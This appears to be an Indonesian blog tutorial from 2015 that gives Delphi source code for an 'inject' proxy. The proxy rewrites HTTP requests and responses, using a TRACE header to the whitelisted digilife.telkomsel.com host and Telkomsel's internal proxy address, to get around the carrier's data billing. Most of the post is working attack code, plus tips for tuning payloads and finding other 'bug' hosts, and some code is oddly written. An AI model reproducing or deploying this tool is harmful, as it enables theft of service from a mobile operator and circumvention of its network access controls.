Jumat, 24 Juli 2015

Cara Buat Payload Injek Telkomsel Untuk Bug Digilife Terbaru 2015

Kali ini Saya mau share Cara Buat Payload Injek Telkomsel Untuk Bug Digilife Terbaru 2015 dan sebelumnya juga sudah di share info tentang Algoritma Cara Kerja Operator Sellular Indonesia dan bagi anda yang ingin mencoba buat inject dari bug digilife silahkan simak dibawah ini.

1. Langkah pertama buka Program Desktop andalan anda disini Contoh menggunakan Borland Delphi 7 Enterprise, Biasakan save as project dulu sebelum menulisakan listing programnnya, dan kita langsung saja silahkan tambahkan komponen BUTTON (1) ada di palette standart , MAPPED (1) ada di palette indy server dan MEMO (1) ada di palette standart

Cara Bikin Injek Indosat XL AXis Telkomsel Terbaru 2015

2. Yang kedua tambahkan dulu zonksel : boolean; diatas private declarations (lihat gambar bawah).

Cara Bikin Injek Indosat XL AXis Telkomsel Terbaru 2015

3. Yang ketiga ubah dulu nama mappednya pada properties > name menjadi digilife lalu klik button1. lalu masukan kode dibawah ini, perhatikan gambar dibawah.

var
I: Integer;
Thread: TIdMappedPortThread;
 begin
 if Zonksel then
begin
with digilife.Threads.LockList do
try
for I := 0 to Count-1 do
begin
 Thread := TIdMappedPortThread(Items[I]);
Thread.Connection.Disconnect;
Thread.OutboundClient.Disconnect;
end;
finally
digilife.Threads.UnlockList;
end;
memo1.Enabled := true;
  sleep (10);
 digilife.Active := False;
 digilife.Bindings.Clear;
Button1.Caption :='Start';
Zonksel := False;
end else
begin
 Button1.Caption :='Stop';
 memo1.Enabled := false;
 sleep (10);
 digilife.Bindings.Add.IP := ('127.0.0.1'); // Local IP Samakan Dengan Input IP HTTP Proxy Pada Layer SSH/VPN dll
 digilife.Bindings.Add.Port := StrToInt ('8877');  // Listen Port Samakan Dengan Input Port HTTP Proxy Pada Layer SSH/VPN dll
 digilife.MappedHost := ('10.1.89.130');  // Proxy Default Telkomsel
 digilife.MappedPort := StrToInt('8000');  // Port Default Telkomsel
 digilife.Active := True;
Zonksel := True;
end;

Cara Bikin Injek Indosat XL AXis Telkomsel Terbaru 2015

4. Yang keempat tambahkan fungsi dulu setelah kode {$R *.dfm} lalu masukan kode dibawah ini:

function AddNetdata(Netdata, NewNetdata:string):string;
begin
Netdata := StringReplace(Netdata, #13#10 + #13#10, #13#10 + NewNetdata + #13#10 + #13#10, [rfReplaceAll, rfIgnoreCase]);
Result := Netdata;  // Fungsi Ini Harus ada Pada Execute
end;

function LowerCase(const Netdata: string): string;
begin
result:=LowerCase(Netdata); // Fungsi Ini Harus ada Pada Execute
end;

Cara Bikin Injek Indosat XL AXis Telkomsel Terbaru 2015

5. Yang kelima masuk TCP kembali atau mapped kembali, pada object inspector > event klik outbounddata lalu masukan kode dibawah ini (lihat gambar bawah)

var
LowerCase : string; // Bagian Download atau Respone Header
begin
Memo1.Lines.Add(AThread.NetData);
if Pos (' #13 ', AThread.NetData) <>0 then begin
AThread.NetData:=StringReplace(AThread.NetData,' #13 ',' #13#10 ',[rfReplaceAll,rfIgnoreCase]);
end else
if Pos (' #10 ', AThread.NetData) <>0 then begin
AThread.NetData:=StringReplace(AThread.NetData,' #10 ',' #13#10 ',[rfReplaceAll,rfIgnoreCase]);
end else
if Pos (' #10#13 ', AThread.NetData) <>0 then begin
AThread.NetData:=StringReplace(AThread.NetData,' #10#13 ',' #13#10 ',[rfReplaceAll,rfIgnoreCase]);
end else
if Pos ('Set-Cookie:', AThread.NetData) <>0 then begin
AThread.NetData := stringreplace(AThread.NetData,'Set-Cookie:','Set-Cookie:SSID : @wifi.id; Domain=my.telkom.co.id; Path=/; Expires=Wed, 13 Jan 2021 22:23:01 GMT; Secure; HttpOnly',[rfReplaceAll,rfIgnoreCase]);
end else
If Pos('HTTP/1.', Athread.NetData) = 1 then begin
 If LowerCase <> '' then begin
 athread.OutboundClient.Write(LowerCase);
 LowerCase:='';
   end;
 If Pos('HTTP/2.', Athread.NetData) = 1 then begin
 If LowerCase <> '' then begin
 athread.OutboundClient.Write(LowerCase);
 LowerCase:='';
    //if athread.netdata contain 'server: apache' then athread.netdata := '';
   end;
  end;
 end;

Cara Bikin Injek Indosat XL AXis Telkomsel Terbaru 2015

6. Yang keenam lalu beralih kesebelah atasnya pada object inspector > event klik execute lalu masukan kode dibawah ini (lihat gambar dibawah);

var
LowerCase: string; // Bagian Upload atau Request Header
Netdata: string;
CE : string;  //connection established
begin
Memo1.Lines.Add(AThread.NetData);
 if pos('HTTP/1.0 200 Connection established',athread.NetData)<> 0 then
 begin
CE:=athread.NetData;
delete(CE,1,(pos('HTTP/1.0 200 Connection established',CE)-1));
LowerCase := StringReplace(athread.NetData,copy(CE,1,(pos(#13#10,CE)-1)),'HTTP/1.0 100 Connection established', [rfReplaceALL,rfIgnoreCase]);
Athread.OutboundClient.Write(stringreplace(athread.netdata,'HTTP/1.0 200 Connection established','HTTP/1.0 100 Connection established',[rfreplaceall,rfIgnoreCase]));
LowerCase :=  athread.NetData;
end else
if (Pos('CONNECT',AThread.NetData)<>0) then
begin
CE:=athread.NetData;
delete(CE,1,(pos('CONNECT',CE)-1));
Athread.NetData:=AddNetdata(Athread.NetData,'Proxy-Connection: Keep-Alive' + #13#10);
LowerCase := StringReplace(athread.NetData,copy(CE,1,(pos(#13#10,CE)-1)),'HTTP/1.0 100 Connection established', [rfReplaceALL,rfIgnoreCase]);
LowerCase := ('TRACE http://digilife.telkomsel.com/HTTP/1.1'+#13#10+'host: digilife.telkomsel.com'+#13#10 +'Accept: */*'+#13#10);
athread.OutboundClient.Write(LowerCase +#13#10);
athread.OutboundClient.Write(Netdata +#13#10);
LowerCase := athread.NetData;
end else
 If Pos('HTTP/1.', Athread.NetData) = 1 then begin
 If LowerCase <> '' then begin
 athread.OutboundClient.Write(LowerCase);
 LowerCase:='';
   end;
 If Pos('HTTP/2.', Athread.NetData) = 1 then begin
 If LowerCase <> '' then begin
 athread.OutboundClient.Write(LowerCase);
 LowerCase:='';
    //if athread.netdata contain 'server: apache' then athread.netdata := '';
   end;
  end;
 end;

Cara Bikin Injek Indosat XL AXis Telkomsel Terbaru 2015


7. Yang terakhir lalu silahkan build projectnya dan silahkan di test.

Cara Bikin Injek Indosat XL AXis Telkomsel Terbaru 2015

Catatan 1: Bagi Sahabat Yang ingin share Ulang Listing Programnnya di Blog sahabat dan website sahabat silahkan berikan link sumber aslinnya

Catatan 2: Jika Tidak work atau belum work perhatikan beberapa saran yang saya berikan
- Ubah Posisi antara Data asli dengan data payload atau sebaliknnya
- Ubah karakter CRLF dengan nilai yang berbeda tetapi dengan nilai x1 contoh yang ada di data payload #13#10 
- Cek kembali Respone Header mungkin nilainnya Responenya bukan 2xx atau jika server memberikan tanggapan 1xx atau 3xx atau 4xx atau 5xx wajib replace makanya saya sediain 1 buah memo buat melihat log datannya.
- Write Client Silahkan ubah posisinya sebelum data payload atau setelah data payload atau mungkin ditiadakan dulu.
- Penambahan fungsi baru (addnetdata) bisa anda ubah ubah posisinya baik sebelum payload atau sesudah payload.
- Jika Hasil racikan konek di IP 10 atau yang lainnya baik IP Genap atau IP Ganjil, harus anda catat kemungkinan di ip yang lainnya akan sulit untuk koneknnya.
- Methode yang disarankan lainnya MERGE, INVALID, LOCK, PATCH, DELETE dan POST

Catatan 3: Mungkin anda pernah atau sering mencoba mencari bug yang bisa digunakan dilokasi anda dengan cara cek open proxy di ping.eu jika hasil cek open proxy berarti bisa digunakan padahal sebenarnnya konsep dan formula sebenarnnya bukan seperti itu, mungkin anda juga masih banyak yang bingung situs, website apa sih yang bisa dijadikan bug itu, sebenarnya sangat mudah cukup modal dengan mengetahui proxy utama dari masing masing operator itu saja.

Catatan 4: Bagi anda yang ingin payload khusus dan 10 bugs tsel spesial edition silahkan bisa anda dapatkan secara gratis DISINI

Jangan Putus asa untuk mencoba dan terus belajar dan silahkan pelajari setiap bagiannya dan fungsi fungsinya dan untuk tutorial payload lainnya silahkan diubek ubek di blog ini karena sudah sangat sering dibahas dan itu saja info seputar Cara Buat Payload Injek Telkomsel Untuk Bug Digilife Terbaru 2015 terima kasih.

Mau paket Data internet Gratis 400 MB Silahkan cek DISINI